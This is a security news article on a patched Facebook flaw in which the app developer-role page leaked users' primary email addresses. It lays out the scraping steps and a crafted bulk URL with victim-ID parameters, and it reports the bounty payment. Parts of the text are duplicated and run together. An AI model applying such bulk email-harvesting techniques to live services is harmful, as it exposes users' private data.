Last week we explained a critical vulnerability in Facebook that discloses the primary email address of facebook user. Later the bug was patched by Facebook Security Team.
Today another similar interesting Facebook hack disclosed by another bug hunter, Roy Castillo. On his blog he explained a new facebook hack method that allows anyone to grab primary emails addresses of billions of Facebook users easily.
Facebook Provides a App Dashboard for creating and managing your Facebook apps, with a range of tools to help you configure, build and debug your Facebook apps.
The flaw exists in App settings, where application admin can add developer's profile also, but if the user is not a verified user, a error messages on page will disclose his primary email address.
Using following mentioned steps, one was able to grab email addresses of all facebook users:
- Collect profile links of all facebook users from Facebook People Directory i.e https://www.facebook.com/directory/people/
- Collect Numerical Facebook ID for each Profile from facebook Graph API i.e https://graph.facebook.com/mohitkumar.thehackernews where extracted user ID is 1251386282
- Create a Facebook Application -> Go to Settings -> Developer Roles and add try to add a Developer profile, if its a valid ID, application will accept that, otherwise a error message will display the email address of that profile.
- To submit profile ID directly from URL parameters : https://developers.facebook.com/apps/APPLICATION_ID/roles?unverified_groups[1][0]=VICTIM_UID
Where APPLICATION_ID is application ID and VICTIM_UID is numerical id of facebook profiles collected from step 2.
To submit more profiles in bulk:
To submit more profiles in bulk:
https://developers.facebook.com/apps/APPLICATION_ID/roles
?unverified_groups[1][0]=VICTIM_UID1
&unverified_groups[2][0]=VICTIM_UID2
&unverified_groups[3][0]=VICTIM_UID3
&unverified_groups[4][0]=VICTIM_UID4
&unverified_groups[5][0]=VICTIM_UID5
&unverified_groups[6][0]=VICTIM_UID6
&unverified_groups[7][0]=VICTIM_UID7
&unverified_groups[8][0]=VICTIM_UID8
&unverified_groups[9][0]=VICTIM_UID9
&unverified_groups[10][0]=VICTIM_UID10
and so forth...
This way attacker is able to dump the primary email address of any number of facebook users at once. But was reported to facebook security team by Roy and he is rewarded with $4500 under bug bounty program.?unverified_groups[1][0]=VICTIM_UID1
&unverified_groups[2][0]=VICTIM_UID2
&unverified_groups[3][0]=VICTIM_UID3
&unverified_groups[4][0]=VICTIM_UID4
&unverified_groups[5][0]=VICTIM_UID5
&unverified_groups[6][0]=VICTIM_UID6
&unverified_groups[7][0]=VICTIM_UID7
&unverified_groups[8][0]=VICTIM_UID8
&unverified_groups[9][0]=VICTIM_UID9
&unverified_groups[10][0]=VICTIM_UID10
and so forth...